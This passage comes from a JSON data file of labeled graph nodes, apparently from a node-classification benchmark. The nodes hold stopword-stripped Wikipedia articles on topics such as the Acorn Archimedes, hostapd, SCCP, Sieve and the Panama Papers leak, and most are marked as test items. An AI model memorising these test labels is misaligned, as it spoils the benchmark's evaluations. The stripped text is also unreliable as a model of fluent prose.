      2853,
      3369,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      10057,
      2893,
      9048,
      11263,
      10078,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      7543,
      11648,
      390,
      11654,
      1416,
      905,
      4493,
      10127,
      912,
      1939,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      1455,
      948,
      439,
      5054,
      9152,
      10694,
      4039,
      5067,
      975,
      5078,
      9689,
      2010,
      9693,
      482,
      485,
      8169,
      495,
      8177,
      8180,
      6133,
      5110,
      6143
    ],
    "mask": "Test"
  },
  {
    "node_id": 10861,
    "label": 5,
    "text": "Cone_(software):cone software cone text-based e-mail client news client unix-like operating systems developed courier mail server developers name stands console newsreader emailer notable features include support unicode support smap",
    "neighbors": [
      1664,
      9986,
      3465,
      9747,
      5397,
      11418,
      9642,
      1075,
      2101,
      9909,
      3015,
      10956,
      6231,
      7255,
      9451,
      9459,
      3578,
      8443,
      7036
    ],
    "mask": "None"
  },
  {
    "node_id": 10862,
    "label": 3,
    "text": "Acorn_Archimedes:acorn archimedes acorn archimedes family personal computers designed acorn computers ltd cambridge england sold late-1980s mid-1990s acorn first general-purpose home computer based arm architecture first archimedes launched 1987 arm risc design 32-bit cpu using 26-bit addressing running 8 mhz stated achieving 4.5+ mips provided significant upgrade 8-bit home computers acorn previous machines claims fastest micro world running 18 mips also made tests models family omitted either acorn archimedes part name first models named bbc archimedes yet name acorn archimedes commonly used describe acorn contemporary designs based architecture archimedes machines longer sold computers raspberry pi still run operating system risc os least later versions use arm chips mostly compatible acorn archimedes first risc-based home computer first models released june 1987 300 400 series 400 series included four expansion slots although two slot backplane could added 300 series official upgrade third parties produced 4-slot backplanes st-506 controller internal hard drive models included arthur operating system later replaced risc os paid-for upgrade bbc basic programming language emulator acorn earlier bbc micro mounted two-part cases small central unit monitor top separate keyboard three-button mouse middle one used pop-up context menus operating system models featured eight-channel 8-bit stereo sound capable displaying 256 colours screen three models initially released different amounts memory a305 a310 a440 soon replaced a410/1 a420/1 a440/1 featured upgraded memc1a a540 supported 16mib ram included higher speed scsi provision connecting genlock devices unveiled september 1990 300 400 followed number machines minor changes upgrades work began successor arthur operating system initially named arthur 2 renamed risc os 2 new computers shipped pre-installed number new machines introduced along risc os 2 may 1989 300 series phased favour new acorn a3000 400 series kept production earlier models shipped arthur could upgraded risc os 2 replacing rom chips containing operating system a3000 used 8 mhz arm2 supplied ram unlike previous models a3000 came single-part case similar bbc micro amiga 500 atari st computers keyboard integrated base unit kind housing consumes lot desktop space problem acorn tried overcome offering monitor stand attached base unit new model sported single internal expansion slot physically different earlier models although electronically similar external connector could interface existing expansion cards although really needed housed external case joined main unit a300 series a400 series r140 a3000 machines vidc1a video chip provided wide variety screen resolutions provided officially operating system chip could made run others palette range 4096 colours 12-bit vidc1a 16 hardware palette registers meant screen modes sixteen colours fewer colours could mapped 4096 available however 256 colour modes 4 bits colour data hardware derived could adjusted net result 256 colours 16 could assigned desired covering range 4096 available colours also horizontal sync interrupt meaning difficult display additional colours changing palette scan line impossible thanks 2 mhz ioc timer 1 many demos managed display 4096 colour screen dithering also one hardware sprite 32 pixels width unlimited height default used mouse pointer pixel coded two bits value 0 transparency three others freely chosen 4096 colour palette 1991 a5000 launched featured new 25 mhz arm3 processor 2 4 mb ram either 40 mb 80 mb hard drive conventional pizza box-style two-part case hxwxd 100 mm × 430 mm × 340 mm enhanced video capabilities allowed a5000 comfortably display vga resolutions 800×600 pixels first archimedes feature high density capable floppy disc drive standard natively supported various formats including dos atari discs risc os adfs floppy format relatively large capacity 800 kb double low density 1600 kb high density later version a5000 featured 33 mhz arm3 4 8 mb ram 80 120 mb hard drive a5000 initially ran new 3.0 version risc os although several bugs identified shipped risc os 3.10 3.11 earlier machines capable upgraded new risc os 3 though needed additional daughterboard installed first earlier models could also benefit video performance a5000 via third party upgrade 1992 new range produced utilising first arm system-on-chip arm250 microprocessor single-chip design including functionality arm3 chip without cache ioc1 input output controller vidc1a video sound controller memc1a memory controller chips integrated one chip increase clock frequency 8 mhz 12 mhz gave performance 7 mips machines supplied risc os 3.10 3.11 a30x0 series one-piece design similar a3000 far smaller a4000 looked like slightly slimmer a5000 a3010 model intended home computing machine featuring tv modulator standard 9-pin joystick ports a3020 targeted home office educational markets featuring built-in 2.5 hard drive dedicated network interface socket technically a4000 almost identical a3020 differing hard disk size 3.5-inch a4000 though sported different appearance three arm250-based machines could upgraded 4 mb plug-in chips though a3010 designed 2 mb third party upgrades overcame one mini-podule slot used internal expansion a3000 also 1992 acorn introduced a4 laptop computer featuring slower 24 mhz compared 25 mhz a5000 version arm3 processor lcd screen capable displaying maximum resolution 15 levels grey however feature monitor port offered display capabilities a5000 notable omission machine built-in pointing device requiring users navigate cursor keys attach conventional acorn three-button mouse a7000 despite name reminiscent archimedes naming conventions actually similar riscpc line risc os computers succeeded archimedes 1994 lacked however debi expansion slots multi-slice case characterized riscpc though removing cdrom backplane one slot could fitted also produced never sold commercially archimedes one powerful home computers available late 1980s early 1990s main cpu faster motorola 68000 microprocessors found popular amiga atari st machines 68000 average performance roughly 16-bit workloads 32-bit workloads peak performance simpler 16-bit instructions yielded 32-bit workloads repeatable benchmark tests computer exhibited 1987 personal computer world show along amiga atari st video game consoles commenting show crash magazine reported despite whiz-bang demos acorn ’ archimedes 8-bit machines dead archimedes significant market share education markets uk ireland australia new zealand success archimedes british schools due partly predecessor bbc micro later computers schools scheme organised tesco supermarket chain association acorn students pupils countries early 1990s exposed archimedes a-series computer archimedes range available us canada via olivetti canada mid late 1990s uk educational market began turn away archimedes apple macintosh computers ibm compatible pcs eclipsed archimedes multimedia capabilities led erosion archimedes market share tesco computers schools scheme later changed partnership acorn rm plc many computer-related suppliers also led decrease archimedes educational market share acorn gradually moved focus away computers instead began exploiting lucrative arm processor technology separate enterprise spin arm holdings founded 1990 1994 2008 model superseding archimedes computer riscpc also used television broadcast automation programmed company named omnibus systems ltd uk original desktop models custom made 19-inch rack models used control/automate multiple television broadcast devices manufactures way unusual time used several large european television stations including bbc nrk tmf nl uk also 1994 2004 archimedes riscpc models used teleprompters television studios hardware easy adapt tv broadcast use cheaper hardware available time",
    "neighbors": [
      8199,
      6152,
      3722,
      8830,
      9363,
      8725,
      3350,
      11033,
      5275,
      2594,
      10029,
      7983,
      9391,
      1849,
      3911,
      4679,
      1611,
      9163,
      8415,
      7269,
      7912,
      9322,
      7019,
      9964,
      8429,
      1776,
      2289,
      4341,
      1527,
      11384,
      9978,
      1790
    ],
    "mask": "Test"
  },
  {
    "node_id": 10863,
    "label": 2,
    "text": "Hostapd:hostapd hostapd host access point daemon user space daemon software enabling network interface card act access point authentication server three implementations jouni malinen hostapd openbsd hostapd devicescape hostapd jouni malinen hostapd user space daemon access point authentication servers used create wireless hotspot using linux computer implements ieee 802.11 access point management ieee 802.1x/wpa/wpa2/eap authenticators radius client eap server radius authentication server current version supports linux host ap madwifi prism54 drivers use kernel mac80211 subsystem qnx freebsd net80211 dragonflybsd openbsd hostapd user space daemon helps improve roaming monitoring openbsd-based wireless networks implements inter access point protocol iapp exchanging station association information access points trigger set actions like frame injection logging receiving specified ieee 802.11 frames open wireless linux version hostapd kept close possible original open source release owl specific packaging defaults website appears dead april 2013 probably project",
    "neighbors": [
      7850,
      10058,
      5612,
      7983,
      10332,
      823,
      6904,
      9336
    ],
    "mask": "Test"
  },
  {
    "node_id": 10864,
    "label": 5,
    "text": "Signalling_Connection_Control_Part:signalling connection control part signalling connection control part sccp network layer protocol provides extended routing flow control segmentation connection-orientation error correction facilities signaling system 7 telecommunications networks sccp relies services mtp basic routing error detection base sccp specification defined itu-t recommendations q.711 q.714 additional information implementors provided q.715 q.716 however regional variations defined local standards bodies united states ansi publishes modifications q.713 ansi t1.112 ttc publishes jt-q.711 jt-q.714 europe etsi publishes etsi en 300-009-1 document modifications itu-t specifications although mtp provides routing capabilities based upon point code sccp allows routing using point code subsystem number global title point code used address particular node network whereas subsystem number addresses specific application available node sccp employs process called global title translation determine point codes global titles instruct mtp route messages sccp messages contain parameters describe type addressing used message routed sccp provides 4 classes protocol applications connectionless protocol classes provide capabilities needed transfer one network service data unit nsdu data field xudt ludt udt message one connectionless message sufficient convey user data contained one nsdu segmenting/reassembly function protocol classes 0 1 provided case sccp originating node relay node provides segmentation information multiple segments prior transfer data field xudt network option ludt messages destination node nsdu reassembled connection-oriented protocol classes protocol classes 2 3 provide means set signalling connections order exchange number related nsdus connection-oriented protocol classes also provide segmenting reassembling capability nsdu longer 255 octets split multiple segments originating node prior transfer data field dt messages segment less equal 255 octets destination node nsdu reassembled sccp class 0 protocol class basic sccp protocol classes network service data units passed higher layers sccp originating node delivered sccp higher layers destination node transferred independently therefore may delivered sccp user out-of-sequence thus protocol class corresponds pure connectionless network service connectionless protocol network connection established sender receiver sccp class 1 builds capabilities class 0 addition sequence control parameter nsdu allows sccp user instruct sccp given stream messages delivered sequence therefore protocol class 1 corresponds enhanced connectionless protocol assurances in-sequence delivery sccp class 2 provides facilities class 1 also allows entity establish two-way dialog another entity using sccp class 3 service builds upon class 2 also allows expedited urgent messages sent received errors sequencing segment re-assembly detected sccp restart connection occur sigtran suite protocols two primary methods transporting sccp applications across internet protocol networks sccp transported indirectly using mtp level 3 user adaptation protocol m3ua protocol provides support users mtp-3—including sccp alternatively sccp applications operate directly sccp user adaptation protocol sua form modified sccp designed specifically use ip networking itu-t also provides transport sccp users internet protocol using generic signalling transport service specified q.2150.0 signalling transport converter sctp specified q.2150.3 specialized transport-independent signalling connection control part ti-sccp specified t-rec-q.2220 ti-sccp also used generic signalling transport adapted mtp3 mtp3b described q.2150.1 adapted sscop sscopmce described q.2150.2",
    "neighbors": [
      5472,
      706,
      7811,
      614,
      5704,
      2701,
      7120,
      4918,
      7865,
      1437,
      3006
    ],
    "mask": "Test"
  },
  {
    "node_id": 10865,
    "label": 4,
    "text": "Structural_vulnerability_(computing):structural vulnerability computing computing structural vulnerability system weakness consists several so-called component vulnerabilities type weakness generally emerges due several system architecture flaws example structural vulnerability person working critical part system security training ’ follow software patch cycles likely disclose critical information phishing attack",
    "neighbors": [
      1453
    ],
    "mask": "Test"
  },
  {
    "node_id": 10866,
    "label": 4,
    "text": "Sieve_(mail_filtering_language):sieve mail filtering language sieve programming language used email filtering owes creation cmu cyrus project creators cyrus imap server language tied particular operating system mail architecture requires use rfc 2822-compliant messages otherwise generalize systems meet criteria current version sieve base specification outlined rfc 5228 published january 2008 sieve data-driven programming language similar earlier email filtering languages procmail maildrop earlier line-oriented languages sed awk specifies conditions match actions take matching differs general-purpose programming languages highly limited – base standard variables loops allow conditional branching preventing runaway programs limiting language simple filtering operations although extensions devised extend language include variables limited degree loops language still highly restricted thus suitable running user-devised programs part mail system also significant number restrictions grammar language order reduce complexity parsing language language also supports use multiple methods comparing localized strings fully unicode-aware sieve scripts may generated gui-based rules editor may entered directly using text editor scripts transferred mail server server-dependent way managesieve protocol defined rfc 5804 allows users manage sieve scripts remote server mail servers local users may allow scripts stored e.g .sieve file users home directories language standardized now-obsolete rfc 3028 january 2001 tim showalter ietf sieve working group updated base specification 2008 rfc 5228 brought following extensions proposed standard status number extensions still developed sieve working group example sieve script",
    "neighbors": [
      515,
      8262,
      9735,
      3465,
      5612,
      10956,
      7983,
      9909,
      9053
    ],
    "mask": "Test"
  },
  {
    "node_id": 10867,
    "label": 4,
    "text": "Panama_Papers:panama papers panama papers 11.5 million leaked documents detail financial attorney–client information 214,488 offshore entities documents dating back 1970s created taken panamanian law firm corporate service provider mossack fonseca leaked 2015 anonymous source documents contain personal financial information wealthy individuals public officials previously kept private offshore business entities legal see offshore magic circle reporters found mossack fonseca shell corporations used illegal purposes including fraud tax evasion evading international sanctions john doe whistleblower leaked documents german journalist bastian obermayer newspaper süddeutsche zeitung sz remains anonymous even journalists worked investigation life danger told may 6 2016 statement john doe cited income inequality reason action said leaked documents simply understood enough contents realize scale injustices described added never worked government intelligence agency expressed willingness help prosecutors granted immunity prosecution sz verified statement fact come source panama papers international consortium investigative journalists icij posted full document website sz asked icij help amount data involved journalists 107 media organizations 80 countries analyzed documents detailing operations law firm year analysis first news stories published april 3 2016 along 150 documents project represents important milestone use data journalism software tools mobile collaboration documents dubbed panama papers country leaked however panamanian government expressed strong objections name concerns would tarnish government country image worldwide entities panama elsewhere led advertising campaign weeks leak titled panama papers media outlets covering story used name mossack fonseca papers addition much-covered business dealings british prime minister david cameron icelandic prime minister sigmundur davíð gunnlaugsson leaked documents also contain identity information shareholders directors 214,000 shell companies set mossack fonseca well financial transactions generally law offshore shell company although offshore shell companies may sometimes used illegal purposes journalists investigative team found business transactions many important figures world politics sports art many transactions legal since data incomplete questions remain many cases still others seem clearly indicate ethical legal impropriety disclosures – tax avoidance poor countries wealthy entities individuals example – lead questions moral grounds according namibian instance shell company registered beny steinmetz octea owes 700,000 us property taxes city koidu sierra leone 150 million red even though exports twice average month 2012–2015 period steinmetz personal worth 6 billion offshore shell company transactions described documents seem broken exchange laws violated trade sanctions stemmed political corruption according icij reporters example named leak 12 current former world leaders 128 public officials politicians hundreds celebrities businessmen wealthy individuals 200 countries individuals entities may open offshore accounts number reasons legal ethically questionable canadian lawyer based dubai noted example businesses might wish avoid falling islamic inheritance jurisprudence owner dies businesses countries may wish hold funds dollars also said brazilian lawyer estate planning another example legal tax avoidance american film-maker stanley kubrick estimated personal worth 20 million died 1999 much invested 18th-century english manor bought 1978 lived manor rest life filming scenes shining full metal jacket eyes wide shut well three holding companies set mossack fonseca property turn held trusts set children grandchildren since kubrick american living britain without trust estate would pay transfer taxes governments possibly forced sell property obtain liquid assets pay kubrick buried grounds along one daughters rest family still lives uses ambiguous chinese companies may incorporate offshore order raise foreign capital normally law china world hereditary dictatorships law may side elite use offshore companies award oil contracts gold concessions children however dealings sometimes prosecuted international law standard official definition exists economist international monetary fund describe offshore financial center tax jurisdiction whose banking infrastructure primarily provides services people businesses live requires little disclosure information business offers low taxes obvious use offshore financial centers avoid taxes economist added oxfam blamed tax havens 2016 annual report income inequality much widening gap rich poor tax havens core global system allows large corporations wealthy individuals avoid paying fair share said raymond c. offenheiser president oxfam america depriving governments rich poor resources need provide vital public services tackle rising inequality international monetary fund imf researchers estimated july 2015 profit shifting multinational companies costs developing countries around us 213 billion year almost two percent national income igor angelini head europol financial intelligence group said shell companies play important role large-scale money laundering activities often means transfer bribe money tax justice network concluded 2012 report designing commercial tax abuse schemes turning blind eye upon suspicious transactions become inherent part work bankers accountants money-laundering affects first world well since favored shell company investment real estate europe north america london miami new york paris vancouver san francisco affected practice parking assets luxury real estate frequently cited fueling skyrocketing housing prices miami miami association realtors said cash sales accounted 90 new home sales 2015 huge amount dirty money flowing miami disguised investment according former congressional investigator jack blum miami 76 condo owners pay cash practice considered red flag money-laundering real estate london housing prices increased 50 2007 2016 also frequently purchased overseas investors donald toon head britain national crime agency said 2015 london property market skewed laundered money prices artificially driven overseas criminals want sequester assets uk three quarters londoners 35 afford buy home andy yan urban planning researcher adjunct professor university british columbia studied real estate sales vancouver—also thought affected foreign purchasers—found 18 transactions vancouver expensive neighborhoods cash purchases 66 owners appeared chinese nationals recent arrivals china calls data foreign investors rejected provincial government chinese nationals accounted 70 2014 vancouver home sales ca 3 million june 24 2016 china citic bank corp filed suit canada chinese citizen borrowed cn¥50 million lumber business china withdrew roughly ca 7.5 million line credit left country bought three houses vancouver surrey british columbia together valued ca 7.3 million three-month period june 2014 issue surely raised g20 summit predicted tomasz kozlowski ambassador european union eu india need strengthen international cooperation exchange tax information tax authorities panama vanuatu lebanon may find list uncooperative tax havens organisation economic co-operation development oecd re-activated july 2016 request g20 nations warned le monde french newspaper participated investigation three countries followed none oecd three broad guidelines international banking cooperation oecd g20 european union could also institute another list countries inadequate one area countries meeting none criteria panama vanuatu lebanon would go blacklist countries meet one criterion would go greylist april 2016 greylist place would included nine countries antigua barbuda bahrain brunei dominica liberia nauru samoa tobago united arab emirates international consortium investigative journalists helped organize research document review süddeutsche zeitung realized scale work required validate authenticity 2.6 terabytes leaked data enlisted reporters resources guardian bbc le monde sonntagszeitung falter la nación german broadcasters ndr wdr austrian broadcaster orf eventually many others ultimately reporters 100 news media outlets working 25 languages used documents investigate individuals organizations associated mossack fonseca security factored number project management considerations saying life danger john doe insisted reporters communicate encrypted channels agree would never meet face-to-face sz also concerns security source leaked documents data also safety partners investigation living corrupt regimes might want money-handling practices made public stored data room limited physical access air gapped computers never connected internet guardian also limited access journalists project work area make even harder sabotage computers steal drives sz journalists made tamper-evident painting screws holding drives place glitter nail polish reporters sorted documents huge file structure containing folder shell company held associated emails contracts transcripts scanned documents mossack fonseca generated business company administering client behalf 4.8 million leaked files emails 3 million database entries 2.2 million pdfs 1.2 million images 320,000 text files 2242 files formats journalists indexed documents using open software packages apache solr apache tika accessed means custom interface built top blacklight süddeutsche zeitung reporters also used nuix proprietary software donated australian company also named nuix using nuix süddeutsche zeitung reporters performed optical character recognition ocr processing millions scanned documents making data contained become searchable machine-readable project reporters used neo4j linkurious extract individual corporate names documents analysis access nuix used well reporters cross-referenced compiled lists people processed documents analyzed information trying connect people roles monetary flow structure legality us banking sec expert david p. weber assisted journalists reviewing information panama papers additional stories released based data full list companies released early may 2016 icij later announced release may 9 2016 searchable database containing information 200,000 offshore entities implicated panama papers investigation 100,000 additional companies implicated 2013 offshore leaks investigation mossack fonseca asked icij publish leaked documents database sent cease desist letter company said statement sheer quantity leaked data greatly exceeds wikileaks cablegate leak 2010 1.7 gb offshore leaks 2013 260 gb 2014 lux leaks 4 gb 3.3 gb swiss leaks 2015 comparison 2.6 tb panama papers equals approximately 2,660 gb mossack fonseca notified clients april 1 2016 sustained email hack mossack fonseca also told news sources company hacked always operated within law data security experts noted however company encrypting emails furthermore seemed running three-year-old version drupal several known vulnerabilities according james sanders techrepublic drupal ran apache 2.2.15 version march 6 2010 worse oracle fork apache default allows users view directory structure network architecture also inherently insecure email web servers segmented client database way reports also suggest parts site may running wordpress out-of-date version revolution slider plugin whose previously-announced vulnerabilities well-documented grey hat hacker named 1×0123 announced april 12 mossack fonseca content management system secured sql injection well-known database attack vector able access customer database computer security expert chris kubecka announced may 24 2016 mossack fonseca client login portal running four different government grade remote access trojans rats kubecka confirmed still numerous critical vulnerabilities many open ports infrastructure internet access archive server due weak security kubecka explained data security issue discovered detail full-length book titled rabbit hole osint journey gerard ryle director international consortium investigative journalists called leak probably biggest blow offshore world ever taken extent documents edward snowden described release twitter message biggest leak history data journalism icij also said leak likely one explosive leaks inside information history nature revelations unique opportunity test effectiveness leaktivism said micah white co-founder occupy ... panama papers dissected via unprecedented collaboration hundreds highly credible international journalists working secretly year global professionalization leaktivism days wikileaks amateurism wikileaks spokesperson kristinn hrafnsson icelandic investigative journalist worked cablegate 2010 said withholding documents time maximise leak impact called full online publication panama papers eventually tweet wikileaks criticized decision icij release everything ethical reasons censor 99 documents engaged 1 journalism definition offshore business entities illegal jurisdictions registered often illegal reporters found mossack fonseca shell corporations seem used illegal purposes including fraud kleptocracy tax evasion evading international sanctions reports april 3 note law firm many connections high-ranking political figures relatives well celebrities business figures among things leaked documents illustrate wealthy individuals including public officials keep personal financial information private initial reports identified five then-heads state government leaders argentina iceland saudi arabia ukraine united arab emirates well government officials close relatives close associates various heads government forty countries names then-current national leaders documents include president khalifa bin zayed al nahyan united arab emirates petro poroshenko ukraine king salman saudi arabia prime minister iceland sigmundur davíð gunnlaugsson former heads state mentioned papers include former prime ministers leaked files identified 61 family members associates prime ministers presidents kings including clients included less-senior government officials close relatives associates forty countries £10 million cash sale gold stolen 1983 brink's-mat robbery laundered first unwittingly later complicity mossack fonseca panamanian company feberion inc company set behalf unnamed client twelve months robbery brinks money put feberion front companies banks switzerland liechtenstein jersey isle man issued bearer shares two nominee directors sark appointed feberion jersey-based offshore specialist centre services offshore firms recycled funds land property transactions united kingdom although metropolitan police service raided offices centre services late 1986 cooperation jersey authorities seized papers two feberion bearer shares n't 1995 brink's-mat solicitors finally able take control feberion assets actor jackie chan mentioned leaked documents shareholder six companies based british virgin islands law firms play central role offshore financial operations mossack fonseca one biggest field biggest financial institutions refer customers services clients include incorporating operating shell companies friendly jurisdictions behalf include creating complex shell company structures legal also allow firm clients operate behind often impenetrable wall secrecy leaked papers detail intricate multilevel multinational corporate structures mossack fonseca acted global consultancy partners like emirates asset management ltd ryan mohanlal ltd sun hedge invest blue capital ltd behalf 300,000 companies registered british overseas territories leaked documents also indicate firm would also backdate documents request based 2007 exchange emails leaked documents routinely enough establish price structure 8.75 per month past 2008 mossack fonseca hired 90-year-old british man pretend owner offshore company marianna olszewski us businesswoman blatant breach anti-money laundering rules according bbc anonymity offshore shell companies also used circumvent international sanctions 30 mossack fonseca clients one time another blacklisted us treasury department including businesses linked senior figures russia syria north korea three mossack fonseca companies started clients helene mathieu legal consultants later sanctioned us treasury office foreign assets control ofac pangates international corporation accused july 2014 supplying government syria large amount specialty petroleum products limited civilian application syria two maxima middle east trading morgan additives manufacturing co owners wael abdulkarim ahmad barqawi said engaged deceptive measures supply oil products syria mossack fonseca also ran six businesses rami makhlouf cousin syrian president bashar al-assad despite us sanctions internal mossack fonseca documents show 2011 mossack fonseca rejected recommendation compliance team sever ties mr. makhlouf agreed months later firm said never knowingly allowed anyone connected rogue regimes use companies frederik obermaier co-author panama papers story investigative reporter german newspaper süddeutsche zeitung told democracy mossack fonseca realised makhlouf cousin realised sanctioned realised allegedly one financiers syrian regime said 'oh bank still business still keep well hsbc also appeared reassure mossack fonseca comfortable makhlouf client suggested could rapprochement assad family us makhlouf already known long-standing client hsbc swiss private bank holding least 15 million multiple accounts 2006 panamanian files also show hsbc provided financial services makhlouf company called drex technologies hsbc said company good standing dcb finance virgin islands-based shell company founded north korean banker kim chol-sam british banker nigel cowie also ignored international sanctions continued business north korea help panamanian firm us treasury department 2013 called dcb finance front company daedong credit bank announced sanctions companies providing banking services north korean arms dealer korea mining development trading corporation attempting evade sanctions country helping sell arms expand north korea nuclear weapons programme cowie said holding company used legitimate business aware illicit transactions mossack fonseca required international banking standards avoid money-laundering fraudster clients like banks supposed particularly alert signs corruption politically exposed persons pep words clients either close ties government officials however somehow failed turn red flags concerning tareq abbas even though shares family name president palestine sat board directors company four fellow directors firm deem pep ties palestinian politics yet mossack fonseca actually documented due diligence research including google search mossack fonseca managed 300,000 companies years number active companies peaked 80,000 2009 210,000 companies twenty-one jurisdictions figure leaks half incorporated british virgin islands others panama bahamas seychelles niue samoa mossack fonseca clients come 100 countries corporate clients hong kong switzerland united kingdom luxembourg panama cyprus mossack fonseca worked 14,000 banks law firms incorporators others set companies foundations trusts clients 3,100 companies listed database appear ties us offshore specialists 3,500 shareholders offshore companies list us addresses mossack fonseca offices nevada wyoming leaked documents indicate us 2 trillion passed firm hands several holding companies appear documents business sanctioned entities arms merchants relatives dictators sanctions place firm provided services seychelles company named pangates international us government believes supplied aviation fuel syrian government current civil war continued handle paperwork certify company good standing despite sanctions august 2015 500 banks registered nearly 15,600 shell companies mossack fonseca hsbc affiliates accounting 2,300 total dexia j. safra sarasin luxembourg credit suisse channel islands swiss ubs requested least 500 offshore companies clients hsbc spokesman said allegations historical cases dating back 20 years predating significant well-publicized reforms implemented last years response queries miami herald icij mossack fonseca issued 2,900-word statement listing legal requirements prevent using offshore companies tax avoidance total anonymity fatf protocols require identifying ultimate beneficial owners companies including offshore companies opening account transacting business miami herald printed statement editor note said statement address specific due diligence failings uncovered reporters monday april 4 mossack fonseca released another statement facts may victim data breach nothing 've seen illegally obtained cache documents suggests 've done anything illegal much keeping global reputation 've built past 40 years business right way co-founder ramón fonseca mora told cnn reports false full inaccuracies parties many circumstances cited icij never clients mossack fonseca firm provided longer statements icij official statement april 6 mossack fonseca suggested responsibility legal violations might lie institutions approximately 90 clientele professional clients ... act intermediaries regulated jurisdiction business clients obliged perform due diligence clients accordance kyc aml regulations subject interview bloomberg jürgen mossack said cat bag deal aftermath said leak inside job —the company hacked servers based abroad filed complaint panamanian attorney general office april 7 2016 mossack resigned panama council foreign relations conarex even though officially serving time brother peter mossack still serves honorary consul panama since 2010 may 5 2016 mossack fonseca sent cease desist letter icij attempt stop icij releasing leaked documents panama papers scandal despite icij released leaked documents may 9 2016 march 2018 mossack fonseca announced would close 5:00 april 3 news first broke ramón fonseca mora told television channel tvn responsible accused tribunal said firm victim hack responsibility clients offshore companies purchased mossack fonseca legal panamanian law later day independent movement movin called calm expressed hope panamanian justice system would allow culprits go impunity april 8 government understood media reports addressing tax evasion attacking panama president met wednesday april 7 candif committee representatives different sectors economy includes chamber commerce chamber industry agriculture national lawyers association international lawyers association banking association stock exchange entered full crisis management mode.on day announced creation new judiciary tribunal high-level commission led nobel prize laureate joseph stiglitz accussations foreign forces attacking panama panama stable robust economy isabel saint malo de alvarado vice president panama said op-ed piece published april 21 guardian president juan carlos varela administration strengthened panama controls money-laundering twenty months power panama setting independent commission co-chaired nobel laureate joseph stiglitz evaluate financial system determine best practices recommend measures strengthen global financial legal transparency expect findings within next six months share results international community however early august 2016 stiglitz resigned committee learned panamanian government would commit making final report public said always assumed final report would transparent april 8 president varela denounced france proposal return panama list countries cooperate information exchange minister presidency alvaro alemán categorically denied panama tax said country would scapegoat alemán said talks french ambassador panama begun april 25 meeting panamanian french finance ministers resulted agreement panama provide information france french nationals taxable assets country ministry economy finance panama dulcidio de la guardia formerly offshore specialist mossack fonseca competitor morgan morgan said legal often murky niche establishing offshore accounts firms trusts make less half percentage point panama gdp appeared suggest publication papers attack panama high level economic growth country shown eduardo morgan panamanian firm morgan morgan accused oecd starting scandal avoid competition panama interests countries panama papers affect image panama unfair manner come light result investigation hack said adolfo linares president chamber commerce industries agriculture panama cciap colegio nacional de abogados de panama cna urged government sue political analyst mario rognoni said world perceives panama tax government president juan carlos varela might become implicated tries cover involved rognoni said economist rolando gordon said affair hurts panama emerged greylist fatf added country especially panama must conduct investigations determine whether illegal improper acts committed panama lawyers movement called panama papers leak cyber bullying press conference condemned attack 'panama brand fraguela alfonso president said called direct attack country financial system invite organized forces country create great crusade rescue country image offshore companies legal said panamanian lawyer former controller republic alvin weeden illegality arises used money laundering arms smuggling terrorism tax evasion october 19 2016 became known government executive spent 370 million u.s. dollars order clean country image october 22 2016 midst state visit germany varela told journalist jenny pérez deutsche welle progress transparency many agreements exchange tax information tax evasion global problem asked ties ramón fonseca mora managing partner firm mossack fonseca acknowledged friend procuraduría de la nación announced would investigate mossack fonseca panama papers april 12 newly formed second specialized prosecutor organized crime raided mossack fonseca searched bella vista office part investigation initiated panama papers attorney general office issued press release following raid lasted 27 hours stating purpose obtain documents relevant information published news articles establishes possible use law firm illegal activities search ended without measures law firm confirmed prosecutor javier caraballo second prosecutor organized crime april 22 unit raided another panama location secured large amount evidence municipality regulation supervision financial subjects ministry economy finance mef initiated special review law firm mossack fonseca determine whether followed tax law carlamara sanchez charge proceeding said press conference quartermaster come verify whether firm complied since april 8 due diligence customer knowledge final beneficiary reporting suspicious transactions financial analysis unit uaf operations said law 23 2015 empowers regulation supervision said firms monitored since late last year special attention panama papers noted law carries fines 5,000 1 million even suspension firm icij investigation mossack fonseca reported public ministry samid dan sandoval former candidate mayor santiago de veraguas 2014 filed legal action journalists participated said project name damaged integrity dignity sovereignty country consortium would assume legal responsibility damage caused panamanian nation change.org petition requested icij stop using name panama panama papers request said generally- accepted name investigation damage image panama attorney general panama kenia isolda porcell diaz announced january 24 2017 suspending investigations mossack fonseca filed appeal protection constitutional rights first superior court justice panama requested deliver original documents issue judgment mossack fonseca detained february 8 2017 money-laundering charges march 2018 mossack fonseca announced would cease operations end march due irreversible damage image direct result panama papers many senior eu figures implicated panama papers scandal european commissioner taxation pierre moscovici said european union whole duty prevent kind tax avoidance uncovered panama papers scandal moscovici told reporters use offshore companies hide called shocking amounts financial assets tax authorities unethical estimated tax shelters resulted annual loss €1 trillion public finances adding european commission attempted tighten tax rules across union since november 2014 due luxembourg leaks scandal also revealed icij hoped extent panama papers revelations would spur countries action 2013 letter unearthed financial times president european council herman van rompuy prime minister united kingdom david cameron said offshore trusts automatically subject transparency requirements shell companies panama papers revealed minister finance andorra jordi cinca ceo orfund sa maintained offshore company called mariette holdings inc dissolution 2002 fear discovery participation businesses business activities orfund ties blood diamond trade refining sale african gold company closed shortly civil war ivory coast opposition demanded resignation result response cinca said connection would affect government andorra step still panama papers show major-general justice head armenia compulsory enforcement service mihran poghosyan connected three panama-registered companies sigtem real estates inc. hopkinten trading inc. bangio invest s.a. issued bearer shares poghosyan degree economics sole owner sigtem hopkinten together owned best realty ltd recently awarded government contracts poghosian resigned april 18 saying unacceptable caused armenia name mentioned alongside azerbaijan whose president ilham aliyev actually embezzled billions dollars april 8 armenian transparency international anti-corruption center filed petition ethics committee high level officials requesting investigation poghosyan members families poghosyan uncles grigor mikhail haroutyunyan also mentioned connection business varuzhan hotkanian head armenian branch anti-corruption watchdog transparency international said perhaps poghosian forced resign country leadership since evidence pointed directly said still questions government commitment fighting corruption leading opposition figure levon zourabian demanded answers matter floor parliament austria financial market authority announced audit two austrian banks mentioned panama papers – raiffeisenbank international rbi specifically examining whether banks complied obligation prevent money laundering hypo vorarlberg subsequently announced complied laws past planning retreat completely offshore sector 2018 investigative media bivol.bg accessed panama papers agreement international consortium investigative journalists later published story offshore company viafot attempting acquire key asset bulgaria defense industry arms producer dunarit panama papers show viafot owned alexander angelov lawyer media mogul delyan peevski bulgarian media reported state institutions help viafot acquire dunarit illegitimate means however inquiry opened bulgaria general prosecutor sotir tsatsarov initially 2016 access panama papers granted journalist alekseniya dimitrova however spokesperson ministry foreign affairs bulgaria raised concern dimitrova worked communist secret services work papers may biased central bank cyprus officially declared 